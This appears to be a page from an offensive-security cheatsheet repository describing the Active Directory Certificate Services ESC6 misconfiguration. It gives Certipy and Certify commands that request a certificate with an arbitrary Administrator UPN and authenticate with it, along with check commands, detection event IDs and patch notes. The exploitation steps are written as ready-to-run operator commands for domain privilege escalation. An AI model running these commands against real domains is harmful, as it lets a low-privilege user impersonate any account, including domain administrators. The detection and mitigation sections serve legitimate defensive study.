daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-31-esc6-editf-attributesubjectaltname2-flag.md (3876B)


      1 ---
      2 title: "Attack #31 β€” ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag"
      3 description: "ESC6 is a CA-wide misconfiguration where the EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled on the Certificate Authority. When this flag is set, it allows…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs"]
      7 tools: ["Certipy", "Certify", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/🟒 Attack #31 β€” ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 Flag.md"
     11 ---
     12 # 🟒 Attack #31 β€” ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 ESC6 is a **CA-wide misconfiguration** where the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is enabled on the Certificate Authority. When this flag is set, it allows certificate requesters to specify an arbitrary **Subject Alternative Name (SAN)** in their certificate request β€” regardless of the template's configuration. This means even templates that normally don't allow SAN specification become vulnerable β€” the attacker can request a certificate for any user in the domain.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **EDITF_ATTRIBUTESUBJECTALTNAME2 enabled on CA** | CA-level configuration flag |
     27 | **Enrollment rights on any Client Auth template** | Any template with Client Authentication EKU |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ### πŸ”΅ Check If Flag Is Enabled
     34 
     35 ```powershell
     36 # ── certutil (on the CA or targeting it remotely) ─────────────────────────────
     37 certutil -config "CORP-CA" -getreg policy\EditFlags
     38 # Look for: EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
     39 ```
     40 
     41 ```bash
     42 # ── Certipy ───────────────────────────────────────────────────────────────────
     43 certipy find -u low_user@corp.local -p 'Password1' -dc-ip 10.10.10.10 -vulnerable -stdout
     44 # Look for: ESC6 β€” EDITF_ATTRIBUTESUBJECTALTNAME2 is set
     45 ```
     46 
     47 ### πŸ”΄ Exploit ESC6
     48 
     49 ```bash
     50 # ── Request cert with arbitrary SAN using ANY template ────────────────────────
     51 certipy req -u low_user@corp.local -p 'Password1' -ca CORP-CA \
     52   -template User -upn Administrator@corp.local -dc-ip 10.10.10.10
     53 
     54 # ── Authenticate as Administrator ─────────────────────────────────────────────
     55 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     56 ```
     57 
     58 ```powershell
     59 # ── Certify ───────────────────────────────────────────────────────────────────
     60 .\Certify.exe request /ca:CORP-CA /template:User /altname:Administrator
     61 ```
     62 
     63 ***
     64 
     65 ## 🎯 OPSEC Tips
     66 
     67 - **ESC6 affects ALL templates** β€” even properly configured ones become vulnerable
     68 - **Microsoft patched this** in May 2022 (KB5014754) β€” patched CAs ignore SAN in request if template doesn't allow it
     69 - **Check patch level** β€” unpatched CAs are still vulnerable
     70 
     71 ***
     72 
     73 ## πŸ›‘οΈ Detection β€” Event IDs
     74 
     75 | Event ID | Source | What to Look For |
     76 |---|---|---|
     77 | **4886** | Security Log (CA) | Certificate enrollment with SAN different from requester |
     78 | **4887** | Security Log (CA) | Certificate issued with arbitrary SAN |
     79 
     80 ***
     81 
     82 ## πŸ”— Attack Chain Context
     83 
     84 ```
     85 [ESC6] ──→ CA flag allows SAN on ANY template β†’ impersonate any user
     86          β”‚
     87          β”œβ”€β”€β†’ πŸ”— Makes every template ESC1-equivalent
     88          β”œβ”€β”€β†’ πŸ“‹ Patched in KB5014754 (May 2022)
     89          └──→ πŸ’€ Defeated by: disable EDITF flag, patch CA, audit enrollments
     90 ```
     91 
     92 ***
     93 
     94 > βœ… **Attack #31 β€” ESC6 complete.**